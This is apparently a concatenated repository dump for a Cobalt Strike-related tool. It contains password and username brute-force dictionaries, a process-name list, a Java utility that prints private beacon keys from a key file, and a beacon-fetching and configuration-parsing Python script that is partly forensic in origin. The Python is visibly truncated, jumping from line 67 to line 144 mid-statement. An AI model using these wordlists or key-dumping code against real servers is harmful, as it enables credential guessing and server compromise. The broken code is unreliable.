| knight 122 | iceman 123 | tigers 124 | purple 125 | andrea 126 | horny 127 | dakota 128 | aaaaaa 129 | player 130 | sunshine 131 | morgan 132 | starwars 133 | boomer 134 | cowboys 135 | edward 136 | charles 137 | girls 138 | booboo 139 | coffee 140 | xxxxxx 141 | bulldog 142 | ncc1701 143 | rabbit 144 | peanut 145 | john 146 | johnny 147 | gandalf 148 | spanky 149 | winter 150 | brandy 151 | compaq 152 | carlos 153 | tennis 154 | james 155 | mike 156 | brandon 157 | fender 158 | anthony 159 | blowme 160 | ferrari 161 | cookie 162 | chicken 163 | maverick 164 | chicago 165 | joseph 166 | diablo 167 | sexsex 168 | hardcore 169 | 666666 170 | willie 171 | welcome 172 | chris 173 | panther 174 | yamaha 175 | justin 176 | banana 177 | driver 178 | marine 179 | angels 180 | fishing 181 | david 182 | maddog 183 | hooters 184 | wilson 185 | butthead 186 | dennis 187 | fucking 188 | captain 189 | bigdick 190 | chester 191 | smokey 192 | xavier 193 | steven 194 | viking 195 | snoopy 196 | blue 197 | eagles 198 | winner 199 | samantha 200 | house 201 | miller 202 | flower 203 | jack 204 | firebird 205 | butter 206 | united 207 | turtle 208 | steelers 209 | tiffany 210 | zxcvbn 211 | tomcat 212 | golf 213 | bond007 214 | bear 215 | tiger 216 | doctor 217 | gateway 218 | gators 219 | angel 220 | junior 221 | thx1138 222 | porno 223 | badboy 224 | debbie 225 | spider 226 | melissa 227 | booger 228 | 1212 229 | flyers 230 | fish 231 | porn 232 | matrix 233 | teens 234 | scooby 235 | jason 236 | walter 237 | cumshot 238 | boston 239 | braves 240 | yankee 241 | lover 242 | barney 243 | victor 244 | tucker 245 | princess 246 | mercedes 247 | 5150 248 | doggie 249 | zzzzzz 250 | gunner 251 | horney 252 | bubba 253 | 2112 254 | fred 255 | johnson 256 | xxxxx 257 | tits 258 | member 259 | boobs 260 | donald 261 | bigdaddy 262 | bronco 263 | penis 264 | voyager 265 | rangers 266 | birdie 267 | trouble 268 | white 269 | topgun 270 | bigtits 271 | bitches 272 | green 273 | super 274 | qazwsx 275 | magic 276 | lakers 277 | rachel 278 | slayer 279 | scott 280 | 2222 281 | asdf 282 | video 283 | london 284 | 7777 285 | marlboro 286 | srinivas 287 | internet 288 | action 289 | carter 290 | jasper 291 | monster 292 | teresa 293 | jeremy 294 | 11111111 295 | bill 296 | crystal 297 | peter 298 | pussies 299 | cock 300 | beer 301 | rocket 302 | theman 303 | oliver 304 | prince 305 | beach 306 | amateur 307 | 7777777 308 | muffin 309 | redsox 310 | star 311 | testing 312 | shannon 313 | murphy 314 | frank 315 | hannah 316 | dave 317 | eagle1 318 | 11111 319 | mother 320 | nathan 321 | raiders 322 | steve 323 | forever 324 | angela 325 | viper 326 | ou812 327 | jake 328 | lovers 329 | suckit 330 | gregory 331 | buddy 332 | whatever 333 | young 334 | nicholas 335 | lucky 336 | helpme 337 | jackie 338 | monica 339 | midnight 340 | college 341 | baby 342 | cunt 343 | brian 344 | mark 345 | startrek 346 | sierra 347 | leather 348 | 232323 349 | 4444 350 | beavis 351 | bigcock 352 | happy 353 | sophie 354 | ladies 355 | naughty 356 | giants 357 | booty 358 | blonde 359 | fucked 360 | golden 361 | 0 362 | fire 363 | sandra 364 | pookie 365 | packers 366 | einstein 367 | dolphins 368 | 0 369 | chevy 370 | winston 371 | warrior 372 | sammy 373 | slut 374 | 8675309 375 | zxcvbnm 376 | nipples 377 | power 378 | victoria 379 | asdfgh 380 | vagina 381 | toyota 382 | travis 383 | hotdog 384 | paris 385 | rock 386 | xxxx 387 | extreme 388 | redskins 389 | erotic 390 | dirty 391 | ford 392 | freddy 393 | arsenal 394 | access14 395 | wolf 396 | nipple 397 | iloveyou 398 | alex 399 | florida 400 | eric 401 | legend 402 | movie 403 | success 404 | rosebud 405 | jaguar 406 | great 407 | cool 408 | cooper 409 | 1313 410 | scorpio 411 | mountain 412 | madison 413 | 987654 414 | brazil 415 | lauren 416 | japan 417 | naked 418 | squirt 419 | stars 420 | apple 421 | alexis 422 | aaaa 423 | bonnie 424 | peaches 425 | jasmine 426 | kevin 427 | matt 428 | qwertyui 429 | danielle 430 | beaver 431 | 4321 432 | 4128 433 | runner 434 | swimming 435 | dolphin 436 | gordon 437 | casper 438 | stupid 439 | shit 440 | saturn 441 | gemini 442 | apples 443 | august 444 | 3333 445 | canada 446 | blazer 447 | cumming 448 | hunting 449 | kitty 450 | rainbow 451 | 112233 452 | arthur 453 | cream 454 | calvin 455 | shaved 456 | surfer 457 | samson 458 | kelly 459 | paul 460 | mine 461 | king 462 | racing 463 | 5555 464 | eagle 465 | hentai 466 | newyork 467 | little 468 | redwings 469 | smith 470 | sticky 471 | cocacola 472 | animal 473 | broncos 474 | private 475 | skippy 476 | marvin 477 | blondes 478 | enjoy 479 | girl 480 | apollo 481 | parker 482 | qwert 483 | time 484 | sydney 485 | women 486 | voodoo 487 | magnum 488 | juice 489 | abgrtyu 490 | 777777 491 | dreams 492 | maxwell 493 | music 494 | rush2112 495 | russia 496 | scorpion 497 | rebecca 498 | tester 499 | mistress 500 | phantom 501 | billy 502 | 6666 503 | albert -------------------------------------------------------------------------------- /dic/process_name_dic.txt: -------------------------------------------------------------------------------- 1 | qq.exe 2 | system.exe 3 | rundll32.exe 4 | everything.exe 5 | dingding.exe 6 | registry.exe 7 | huorong.exe 8 | zhudongfangyu.exe 9 | home.exe 10 | weichat.exe 11 | microsoftedge.exe 12 | google.exe 13 | cmd.exe 14 | powershell.exe 15 | pobear.exe 16 | master.exe 17 | sys.exe 18 | adams.exe 19 | admin.exe 20 | admn.exe 21 | advmail.exe 22 | allin1.exe 23 | allin1mail.exe 24 | allinone.exe 25 | ap2svp.exe 26 | apl2pp.exe 27 | applsys.exe 28 | apps.exe 29 | aqdemo.exe 30 | aquser.exe 31 | archivist.exe 32 | autolog1.exe 33 | batch.exe 34 | batch1.exe 35 | batch2.exe 36 | blake.exe 37 | catalog.exe 38 | cdemo82.exe 39 | cdemocor.exe 40 | cdemorid.exe 41 | cdemoucb.exe 42 | chey_archsvr.exe 43 | clark.exe 44 | cmsbatch.exe 45 | cmsuser.exe 46 | company.exe 47 | cpnuc.exe 48 | cprm.exe 49 | cspuser.exe 50 | ctxdemo.exe 51 | ctxsys.exe 52 | cview.exe 53 | dlink.exe 54 | datamove.exe 55 | dba.exe 56 | dbsnmp.exe 57 | dcl.exe 58 | ddic.exe 59 | decmail.exe 60 | decnet.exe 61 | default.exe 62 | demo.exe 63 | demo1.exe 64 | demo2.exe 65 | demo3.exe 66 | demo4.exe 67 | demo8.exe 68 | desquetop.exe 69 | direct.exe 70 | dirmaint.exe 71 | diskcnt.exe 72 | ds.exe 73 | dsa.exe 74 | earlywatch.exe 75 | emp.exe 76 | erep.exe 77 | essex.exe 78 | event.exe 79 | ezsetup.exe 80 | fax.exe 81 | faxuser.exe 82 | faxworks.exe 83 | field.exe 84 | finance.exe 85 | fnd.exe 86 | fsfadmin.exe 87 | fsftask1.exe 88 | fsftask2.exe 89 | gateway.exe 90 | gcs.exe 91 | gen1.exe 92 | gen2.exe 93 | gpfd.exe 94 | gpld.exe 95 | guest.exe 96 | hello.exe 97 | help.exe 98 | helpdesk.exe 99 | host.exe 100 | hplaser.exe 101 | idms.exe 102 | idmsse.exe 103 | iips.exe 104 | info.exe 105 | ingres.exe 106 | ipc.exe 107 | ipfserv.exe 108 | ispvm.exe 109 | ivpm1.exe 110 | ivpm2.exe 111 | intrastack.exe 112 | intraswitch.exe 113 | jde.exe 114 | jones.exe 115 | jetform.exe 116 | laser.exe 117 | laserwriter.exe 118 | library.exe 119 | link.exe 120 | lucent01.exe 121 | lucent02.exe 122 | mail.exe 123 | mailer.exe 124 | maint.exe 125 | manager.exe 126 | mbmanager.exe 127 | mbwatch.exe 128 | mdsys.exe 129 | mfg.exe 130 | mge.exe 131 | mgr.exe 132 | micro.exe 133 | miller.exe 134 | mmo2.exe 135 | modtest.exe 136 | moeserv.exe 137 | moreau.exe 138 | mtysys.exe 139 | names.exe 140 | netcon.exe 141 | netmgr.exe 142 | netnonpriv.exe 143 | netop.exe 144 | netpriv.exe 145 | netserver.exe 146 | network.exe 147 | neview.exe 148 | newingres.exe 149 | news.exe 150 | niconex.exe 151 | ocitest.exe 152 | oltsep.exe 153 | op1.exe 154 | operatns.exe 155 | operator.exe 156 | opervax.exe 157 | ordplugins.exe 158 | ordsys.exe 159 | outln.exe 160 | outofbox.exe 161 | pbx.exe 162 | pcuser.exe 163 | pdmremi.exe 164 | pdp11.exe 165 | pdp8.exe 166 | peng.exe 167 | pfcuser.exe 168 | phantom.exe 169 | po.exe 170 | po8.exe 171 | post.exe 172 | postmaster.exe 173 | powercartuser.exe 174 | primary.exe 175 | print.exe 176 | printer.exe 177 | priv.exe 178 | procal.exe 179 | prodbm.exe 180 | promail.exe 181 | pseadmin.exe 182 | psfmaint.exe 183 | pubsub.exe 184 | pvm.exe 185 | rdm470.exe 186 | re.exe 187 | report.exe 188 | rje.exe 189 | rmail.exe 190 | rman.exe 191 | rmuser1.exe 192 | router.exe 193 | rsbcmon.exe 194 | rscs.exe 195 | rscsv2.exe 196 | sabre.exe 197 | sample.exe 198 | sapcpic.exe 199 | savsys.exe 200 | scott.exe 201 | secdemo.exe 202 | setup.exe 203 | sfcmi.exe 204 | sfcntrl.exe 205 | smart.exe 206 | spoolman.exe 207 | sqldba.exe 208 | sqluser.exe 209 | student.exe 210 | supervisor.exe 211 | sysadm.exe 212 | sysckp.exe 213 | sysdba.exe 214 | sysdump1.exe 215 | syserr.exe 216 | sysmaint.exe 217 | sysman.exe 218 | system.exe 219 | systest.exe 220 | syswrm.exe 221 | sysop.exe 222 | tdisk.exe 223 | teledemo.exe 224 | temp.exe 225 | tracesrv.exe 226 | tsafvm.exe 227 | tsdev.exe 228 | tsuser.exe 229 | uetp.exe 230 | user0.exe 231 | user1.exe 232 | user2.exe 233 | user3.exe 234 | user4.exe 235 | user5.exe 236 | user6.exe 237 | user7.exe 238 | user8.exe 239 | user9.exe 240 | userp.exe 241 | vastest.exe 242 | vax.exe 243 | vm3812.exe 244 | vmarch.exe 245 | vmasmon.exe 246 | vmassys.exe 247 | vmbackup.exe 248 | vmbsysad.exe 249 | vmmap.exe 250 | vms.exe 251 | vmtape.exe 252 | vmtlibr.exe 253 | vmutil.exe 254 | vnc.exe 255 | vrr1.exe 256 | vseipo.exe 257 | vsemaint.exe 258 | vseman.exe 259 | vtam.exe 260 | vtamuser.exe 261 | wangtek.exe 262 | winsabre.exe 263 | wp.exe 264 | webadmin.exe 265 | aaren.exe 266 | aarika.exe 267 | abbi.exe 268 | abbie.exe 269 | accounting.exe 270 | ad.exe 271 | ada.exe 272 | adah.exe 273 | adair.exe 274 | adaline.exe 275 | adam.exe 276 | adamo.exe 277 | adan.exe 278 | adara.exe 279 | adda.exe 280 | addi.exe 281 | addia.exe 282 | addie.exe 283 | addison.exe 284 | addy.exe 285 | ade.exe 286 | adel.exe 287 | adela.exe 288 | adelaida.exe 289 | adelaide.exe 290 | adler.exe 291 | admin2.exe 292 | adminstrator.exe 293 | adminttd.exe 294 | ado.exe 295 | adolf.exe 296 | adolph.exe 297 | adolphe.exe 298 | adolpho.exe 299 | adolphus.exe 300 | babbette.exe 301 | babbie.exe 302 | babette.exe 303 | babita.exe 304 | babs.exe 305 | bail.exe 306 | bailey.exe 307 | bailie.exe 308 | baillie.exe 309 | baily.exe 310 | baird.exe 311 | bald.exe 312 | balduin.exe 313 | baldwin.exe 314 | bale.exe 315 | bambi.exe 316 | bambie.exe 317 | bamby.exe 318 | ban.exe 319 | bancroft.exe 320 | bank.exe 321 | banky.exe 322 | bar.exe 323 | barb.exe 324 | barbabas.exe 325 | barnaby.exe 326 | barnard.exe 327 | barnebas.exe 328 | barnett.exe 329 | barney.exe 330 | barnie.exe 331 | barny.exe 332 | baron.exe 333 | barr.exe 334 | barret.exe 335 | barrett.exe 336 | barri.exe 337 | barrie.exe 338 | barris.exe 339 | barron.exe 340 | barry.exe 341 | bart.exe 342 | bartel.exe 343 | barth.exe 344 | barthel.exe 345 | bartholemy.exe 346 | bartholomeo.exe 347 | bartholomeus.exe 348 | bartholomew.exe 349 | bartie.exe 350 | bartlet.exe 351 | bartlett.exe 352 | bartolemo.exe 353 | bartolomeo.exe 354 | barton.exe 355 | bartram.exe 356 | barty.exe 357 | bary.exe 358 | baryram.exe 359 | becca.exe 360 | beck.exe 361 | becka.exe 362 | becki.exe 363 | beckie.exe 364 | becky.exe 365 | bee.exe 366 | beilul.exe 367 | beitris.exe 368 | bekki.exe 369 | bel.exe 370 | belia.exe 371 | belicia.exe 372 | belinda.exe 373 | belita.exe 374 | bell.exe 375 | bella.exe 376 | bellanca.exe 377 | belle.exe 378 | bellina.exe 379 | camilla.exe 380 | camille.exe 381 | cammi.exe 382 | cammie.exe 383 | cammy.exe 384 | candace.exe 385 | candi.exe 386 | candice.exe 387 | candida.exe 388 | candide.exe 389 | candie.exe 390 | candis.exe 391 | candra.exe 392 | candy.exe 393 | caprice.exe 394 | car.exe 395 | cara.exe 396 | caralie.exe 397 | carce.exe 398 | care.exe 399 | caren.exe 400 | carena.exe 401 | caresa.exe 402 | caressa.exe 403 | caresse.exe 404 | carey.exe 405 | cari.exe 406 | carrol.exe 407 | carroll.exe 408 | carry.exe 409 | carson.exe 410 | cart.exe 411 | carter.exe 412 | carver.exe 413 | cary.exe 414 | caryl.exe 415 | caryn.exe 416 | casandra.exe 417 | casar.exe 418 | case.exe 419 | casey.exe 420 | cash.exe 421 | casi.exe 422 | casie.exe 423 | caspar.exe 424 | casper.exe 425 | cass.exe 426 | cassandra.exe 427 | cassandre.exe 428 | cassandry.exe 429 | cassaundra.exe 430 | cassey.exe 431 | cassi.exe 432 | cassie.exe 433 | cassius.exe 434 | cassondra.exe 435 | cassy.exe 436 | catarina.exe 437 | cate.exe 438 | caterina.exe 439 | catha.exe 440 | catharina.exe 441 | catharine.exe 442 | cathe.exe 443 | cathee.exe 444 | fidelio.exe 445 | fidelity.exe 446 | fidole.exe 447 | fielding.exe 448 | field.exe 449 | marika.exe 450 | marilee.exe 451 | marilin.exe 452 | marillin.exe 453 | marilyn.exe 454 | marin.exe 455 | marina.exe 456 | marinna.exe 457 | terrijo.exe 458 | terrill.exe 459 | terry.exe 460 | terrye.exe 461 | tersina.exe 462 | terza.exe 463 | tess.exe 464 | tessa.exe 465 | tessi.exe 466 | tessie.exe 467 | tessy.exe 468 | thacher.exe 469 | thaddeus.exe 470 | thaddus.exe 471 | thadeus.exe 472 | thain.exe 473 | thaine.exe 474 | thalia.exe 475 | thane.exe 476 | thatch.exe 477 | thatcher.exe 478 | thaxter.exe 479 | thayne.exe 480 | thea.exe 481 | theadora.exe 482 | thebault.exe 483 | theda.exe 484 | thedric.exe 485 | thedrick.exe 486 | thekla.exe 487 | thelma.exe 488 | wolfie.exe 489 | wolfy.exe 490 | wood.exe 491 | woodie.exe 492 | woodman.exe 493 | woodrow.exe 494 | woody.exe 495 | worden.exe 496 | worth.exe 497 | worthington.exe 498 | worthy.exe 499 | wradmin.exe 500 | wren.exe 501 | wrennie.exe 502 | wright.exe 503 | write.exe 504 | www.exe 505 | wyatan.exe 506 | wyatt.exe 507 | wye.exe 508 | wylie.exe 509 | wylma.exe 510 | wyn.exe 511 | wyndham.exe 512 | wynn.exe 513 | wynne.exe 514 | wynnie.exe 515 | wynny.exe 516 | xavier.exe 517 | xaviera.exe 518 | xena.exe 519 | xenia.exe 520 | yvon.exe 521 | yvonne.exe 522 | yvor.exe 523 | zabrina.exe 524 | zaccaria.exe 525 | zach.exe 526 | zacharia.exe 527 | zachariah.exe 528 | zacharias.exe 529 | zacharie -------------------------------------------------------------------------------- /dic/user_name_dic.txt: -------------------------------------------------------------------------------- 1 | system 2 | Administration 3 | www 4 | admin 5 | weblogic 6 | ftp 7 | manager 8 | manage 9 | administrator 10 | account 11 | super 12 | superuser 13 | master 14 | imap 15 | memcached 16 | mongodb 17 | oracle 18 | pop3 19 | postgresql 20 | rdp 21 | redis 22 | smb 23 | smtp 24 | sqlserver 25 | ssh 26 | svn 27 | telnet 28 | tomcat 29 | vnc 30 | xiaomi 31 | huawei 32 | apple 33 | topsec 34 | 360 35 | qihoo 36 | 1688 37 | aliyun 38 | alipay 39 | www 40 | web 41 | webadmin 42 | webmaster 43 | anonymous 44 | jboss 45 | 1 46 | admin1 47 | root 48 | sever 49 | system 50 | develop 51 | developer 52 | developers 53 | development 54 | devserver 55 | devsql 56 | zhangwei 57 | wangwei 58 | wangfang 59 | liwei 60 | lina 61 | zhangmin 62 | lijing 63 | wangjing 64 | liuwei 65 | wangxiuying 66 | zhangli 67 | lixiuying 68 | wangli 69 | zhangjing 70 | zhangxiuying 71 | liqiang 72 | wangmin 73 | limin 74 | wanglei 75 | liuyang 76 | wangyan 77 | wangyong 78 | lijun 79 | zhangyong 80 | lijie 81 | zhangjie 82 | zhanglei 83 | wangqiang 84 | lijuan 85 | wangjun 86 | zhangyan 87 | zhangtao 88 | wangtao 89 | liyan 90 | wangchao 91 | liming 92 | liyong 93 | wangjuan 94 | liujie 95 | liumin 96 | lixia 97 | lili 98 | zhangjun 99 | wangjie 100 | zhangqiang 101 | wangxiulan 102 | wanggang 103 | wangping 104 | liufang 105 | liuyan 106 | liujun 107 | liping 108 | wanghui 109 | chenjing 110 | liuyong 111 | liling 112 | liguiying 113 | wangdan 114 | ligang 115 | lidan 116 | wangpeng 117 | liutao 118 | chenwei 119 | zhanghua 120 | liujing 121 | litao 122 | wangguiying 123 | zhangxiulan 124 | lihong 125 | lichao 126 | liuli 127 | zhangguiying 128 | wangyulan 129 | zhangpeng 130 | lixiulan 131 | zhangchao 132 | wangling 133 | zhangling 134 | lihua 135 | wangfei 136 | zhangyulan 137 | wangguilan 138 | wangying 139 | liuqiang 140 | chenxiuying 141 | liying 142 | lihui 143 | limei 144 | chenyong 145 | wang 146 | lifang 147 | zhangguilan 148 | libo 149 | yangyong 150 | wangxia 151 | liguilan 152 | wangbin 153 | lipeng 154 | zhangping 155 | zhanghui 156 | zhangyu 157 | liujuan 158 | libin 159 | wanghao 160 | chenjie 161 | wangkai 162 | chenli 163 | chenmin 164 | wangxiuzhen 165 | liyulan 166 | liuxiuying 167 | zhangbo 168 | liuguiying 169 | yangxiuying 170 | zhangying 171 | yangli 172 | zhangjian 173 | wangbo 174 | zhanghong 175 | liudan 176 | li 177 | yangjing 178 | liuchao 179 | zhangjuan 180 | yangfan 181 | liuying 182 | lixue 183 | lixiuzhen 184 | zhang 185 | wangjian 186 | liuyulan 187 | liuhui 188 | liubo 189 | zhanghao 190 | zhangming 191 | chenyan 192 | zhangxia 193 | yangjie 194 | wangshuai 195 | wangxue 196 | yangjun 197 | zhangxu 198 | liugang 199 | wanghua 200 | yangmin 201 | wangning 202 | lining 203 | liuguilan 204 | liubin 205 | chentao 206 | wangyumei 207 | wangna 208 | zhangbin 209 | chenlong 210 | lilin 211 | wangyuzhen 212 | zhangfengying 213 | wanghong 214 | lifengying 215 | yangyang 216 | wanglin 217 | chenying 218 | chenjun 219 | liuxia 220 | chenhao 221 | zhangkai 222 | chenfang 223 | yangtao 224 | yangbo 225 | chenhong 226 | liuhuan 227 | wangyuying 228 | chenjuan 229 | chengang 230 | zhanglin 231 | zhangna 232 | zhangyumei 233 | wangfengying 234 | zhangyuying 235 | lihongmei 236 | liujia 237 | liulei 238 | liupeng 239 | wangxu 240 | zhangxue 241 | liyang 242 | zhangxiuzhen 243 | wangmei 244 | wangjianhua 245 | liyumei 246 | liuping 247 | yangmei 248 | lifei 249 | wangliang 250 | lilei 251 | lijianhua 252 | wangyu 253 | chenling 254 | zhangjianhua 255 | liu 256 | zhangshuai 257 | lijian 258 | chenlin 259 | chenqiang 260 | zhaojing 261 | wangcheng 262 | zhangyuzhen 263 | chenchao 264 | chenliang 265 | liuna 266 | wangqin 267 | zhanglanying 268 | liuchang 269 | yangyan 270 | zhangliang 271 | liyun 272 | zhangqin 273 | wanglanying 274 | liyuzhen 275 | chenguiying 276 | yangchao 277 | zhangmei 278 | chenping 279 | liuhong 280 | zhaowei 281 | zhangyun 282 | zhangning 283 | yanglin 284 | gaofeng 285 | wangjianguo 286 | chenhua 287 | yanghua 288 | wangjianjun 289 | yangliu 290 | wangshuzhen 291 | yangfang 292 | lichunmei 293 | wanghaiyan 294 | liuling 295 | chenchen 296 | wanghuan 297 | lidongmei 298 | zhanglong 299 | chenbo 300 | chenlei 301 | wangyun 302 | wangfeng 303 | wangxiurong 304 | wangrui 305 | liqin 306 | liguizhen 307 | chenpeng 308 | liufei 309 | wangxiuyun 310 | chenming 311 | wangguirong 312 | lihao 313 | wangzhiqiang 314 | zhangdan 315 | lifeng 316 | zhanghongmei 317 | liufengying 318 | liyuying 319 | wangxiumei 320 | lijia 321 | wanglijuan 322 | chenhui 323 | zhangfang 324 | wangyuhua 325 | zhangjianguo 326 | lilanying 327 | wangguizhen 328 | lixiumei 329 | chenyulan 330 | chenxia 331 | liukai 332 | zhangyuhua 333 | liuyumei 334 | liuhua 335 | libing 336 | wangdong 337 | lijianjun 338 | liuyuzhen 339 | lijianguo 340 | yangwei 341 | liguirong 342 | wanglong 343 | chenxiulan 344 | zhangjianjun 345 | lixiurong 346 | liuming 347 | zhoumin 348 | zhangxiumei 349 | lixuemei 350 | huangwei 351 | zhanghaiyan 352 | wangshulan 353 | lizhiqiang 354 | yanglei 355 | zhangxiurong 356 | liujianhua 357 | wanglili 358 | zhaomin 359 | chenyun 360 | lihaiyan 361 | zhangguirong 362 | likai 363 | zhangfeng 364 | liuxiulan 365 | zhangzhiqiang 366 | lilong 367 | lixiuyun 368 | lixiufang 369 | lishuai 370 | lixin 371 | liuyun 372 | zhanglili 373 | zhangxiuyun 374 | wangshuying 375 | wangchunmei 376 | wanghongmei 377 | chenbin 378 | liyuhua 379 | liguifang 380 | chenfei 381 | liuhao 382 | huangxiuying 383 | liuyuying 384 | lishuzhen 385 | huangyong 386 | zhouwei 387 | wangxiufang 388 | wanglihua 389 | wangdandan 390 | wangguixiang 391 | wangkun 392 | lixiang 393 | zhangrui 394 | zhangguizhen 395 | wangshuhua 396 | liushuai 397 | zhangfei 398 | zhangxiufang 399 | wangyang 400 | zhangguifang 401 | zhanglijuan 402 | wangrong 403 | wuxiuying 404 | yangming 405 | liguixiang 406 | mali 407 | yangxiulan 408 | yangling 409 | wangxiuhua 410 | yangping 411 | liliang 412 | lirong 413 | liguizhi 414 | wangbing 415 | wangguifang 416 | wangming 417 | chenmei 418 | zhangchunmei 419 | wangdongmei 420 | liufeng 421 | lixiuhua 422 | lidandan 423 | yangxue 424 | liuyuhua 425 | maxiuying 426 | zhanglihua 427 | zhangshuzhen 428 | lixiaohong 429 | wangxin 430 | wangguizhi 431 | zhaoli 432 | zhangxiuhua 433 | huangmin 434 | yangjuan 435 | wangjinfeng 436 | zhoujie 437 | chenjianhua 438 | liumei 439 | yangguiying 440 | lishuying 441 | chenyuying 442 | yangxiuzhen 443 | sunxiuying 444 | zhaojun 445 | zhaoyong 446 | liubing 447 | yangbin 448 | liwen 449 | sunwei 450 | liuguizhen 451 | liuyu 452 | liujianjun 453 | zhangshuying 454 | lihongxia 455 | zhaoxiuying 456 | zhangrong 457 | zhangfan 458 | wangjianping 459 | zhangguizhi 460 | zhouyong 461 | zhangkun 462 | xuwei 463 | wangguihua 464 | liuqin 465 | zhoujing 466 | xumin 467 | xujing 468 | yanghong 469 | yangziwen 470 | zhangshulan 471 | zhangwen 472 | chenguilan 473 | zhouli 474 | lishuhua 475 | chen 476 | machao 477 | liujianguo 478 | liguihua 479 | wangfenglan 480 | lishulan 481 | chenxiuzhen -------------------------------------------------------------------------------- /img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Potato-py/csIntruder/de021d6fd5227df6a07831ca3cc9a7f3cc4672fd/img/1.png -------------------------------------------------------------------------------- /img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Potato-py/csIntruder/de021d6fd5227df6a07831ca3cc9a7f3cc4672fd/img/2.png -------------------------------------------------------------------------------- /img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Potato-py/csIntruder/de021d6fd5227df6a07831ca3cc9a7f3cc4672fd/img/3.png -------------------------------------------------------------------------------- /img/33.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Potato-py/csIntruder/de021d6fd5227df6a07831ca3cc9a7f3cc4672fd/img/33.png -------------------------------------------------------------------------------- /img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Potato-py/csIntruder/de021d6fd5227df6a07831ca3cc9a7f3cc4672fd/img/4.png -------------------------------------------------------------------------------- /tool/DumpKeys.java: -------------------------------------------------------------------------------- 1 | import java.io.File; 2 | import java.util.Base64; 3 | import common.CommonUtils; 4 | import java.security.KeyPair; 5 | 6 | class DumpKeys 7 | { 8 | public static void main(String[] args) 9 | { 10 | try { 11 | File file = new File(".cobaltstrike.beacon_keys"); 12 | if (file.exists()) { 13 | KeyPair keyPair = (KeyPair)CommonUtils.readObject(file, null); 14 | System.out.printf("Private Key: %s\n\n", new String(Base64.getEncoder().encode(keyPair.getPrivate().getEncoded()))); 15 | System.out.printf("Public Key: %s\n\n", new String(Base64.getEncoder().encode(keyPair.getPublic().getEncoded()))); 16 | } 17 | else { 18 | System.out.println("Could not find .cobaltstrike.beacon_keys file"); 19 | } 20 | } 21 | catch (Exception exception) { 22 | System.out.println("Could not read asymmetric keys"); 23 | } 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /tool/beacon_utils.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | ''' 3 | By Gal Kristal from SentinelOne (gkristal.w@gmail.com) @gal_kristal 4 | Refs: 5 | https://github.com/RomanEmelyanov/CobaltStrikeForensic/blob/master/L8_get_beacon.py 6 | https://github.com/nccgroup/pybeacon 7 | ''' 8 | 9 | import requests, struct, urllib3 10 | import argparse 11 | from urllib.parse import urljoin 12 | import socket 13 | import json 14 | from base64 import b64encode 15 | from struct import unpack, unpack_from 16 | 17 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 18 | EMPTY_UA_HEADERS = {"User-Agent":""} 19 | URL_PATHS = {'x86':'ab2g', 'x64':'ab2h'} 20 | 21 | class Base64Encoder(json.JSONEncoder): 22 | def default(self, o): 23 | if isinstance(o, bytes): 24 | return b64encode(o).decode() 25 | return json.JSONEncoder.default(self, o) 26 | 27 | 28 | def _cli_print(msg, end='\n'): 29 | if __name__ == '__main__': 30 | print(msg, end=end) 31 | 32 | 33 | def read_dword_be(fh): 34 | data = fh.read(4) 35 | if not data or len(data) != 4: 36 | return None 37 | return unpack(">I",data)[0] 38 | 39 | 40 | def get_beacon_data(url, arch): 41 | full_url = urljoin(url, URL_PATHS[arch]) 42 | try: 43 | resp = requests.get(full_url, timeout=30, headers=EMPTY_UA_HEADERS, verify=False) 44 | except requests.exceptions.RequestException as e: 45 | _cli_print('[-] Connection error: ', e) 46 | return 47 | 48 | if resp.status_code != 200: 49 | _cli_print('[-] Failed with HTTP status code: ', resp.status_code) 50 | return 51 | 52 | buf = resp.content 53 | 54 | # Check if it's a Trial beacon, therefore not xor encoded (not tested) 55 | eicar_offset = buf.find(b'EICAR-STANDARD-ANTIVIRUS-TEST-FILE') 56 | if eicar_offset != -1: 57 | return buf 58 | return decrypt_beacon(buf) 59 | 60 | 61 | def decrypt_beacon(buf): 62 | offset = buf.find(b'\xff\xff\xff') 63 | if offset == -1: 64 | _cli_print('[-] Unexpected buffer received') 65 | return 66 | offset += 3 67 | key = struct.unpack_from(' 0: 144 | break 145 | self.length *= 2 146 | 147 | if data_offset < 0: 148 | return 'Not Found' 149 | 150 | repr_len = len(self.binary_repr()) 151 | conf_data = full_config_data[data_offset + repr_len : data_offset + repr_len + self.length] 152 | if self.datatype == confConsts.TYPE_SHORT: 153 | conf_data = unpack('>H', conf_data)[0] 154 | if self.is_bool: 155 | ret = 'False' if conf_data == self.bool_false_value else 'True' 156 | return ret 157 | elif self.enum: 158 | return self.enum[conf_data] 159 | elif self.mask: 160 | ret_arr = [] 161 | for k,v in self.mask.items(): 162 | if k == 0 and k == conf_data: 163 | ret_arr.append(v) 164 | if k & conf_data: 165 | ret_arr.append(v) 166 | return ret_arr 167 | else: 168 | return conf_data 169 | 170 | elif self.datatype == confConsts.TYPE_INT: 171 | if self.is_ipaddress: 172 | return inet_ntoa(conf_data) 173 | 174 | else: 175 | conf_data = unpack('>i', conf_data)[0] 176 | if self.is_date and conf_data != 0: 177 | fulldate = str(conf_data) 178 | return "%s-%s-%s" % (fulldate[0:4], fulldate[4:6], fulldate[6:]) 179 | 180 | return conf_data 181 | 182 | if self.is_blob: 183 | if self.enum != None: 184 | ret_arr = [] 185 | i = 0 186 | while i < len(conf_data): 187 | v = conf_data[i] 188 | if v == 0: 189 | return ret_arr 190 | v = self.enum[v] 191 | if v: 192 | ret_arr.append(v) 193 | i+=1 194 | 195 | # Only EXECUTE_TYPE for now 196 | else: 197 | # Skipping unknown short value in the start 198 | string1 = netunpack(b'I$', conf_data[i+3:])[0].decode() 199 | string2 = netunpack(b'I$', conf_data[i+3+4+len(string1):])[0].decode() 200 | ret_arr.append("%s:%s" % (string1.strip('\x00'),string2.strip('\x00'))) 201 | i += len(string1) + len(string2) + 11 202 | 203 | 204 | if self.is_transform: 205 | if conf_data == bytes(len(conf_data)): 206 | return 'Empty' 207 | 208 | ret_arr = [] 209 | prepend_length = unpack('>I', conf_data[0:4])[0] 210 | prepend = conf_data[4 : 4+prepend_length] 211 | append_length_offset = prepend_length + 4 212 | append_length = unpack('>I', conf_data[append_length_offset : 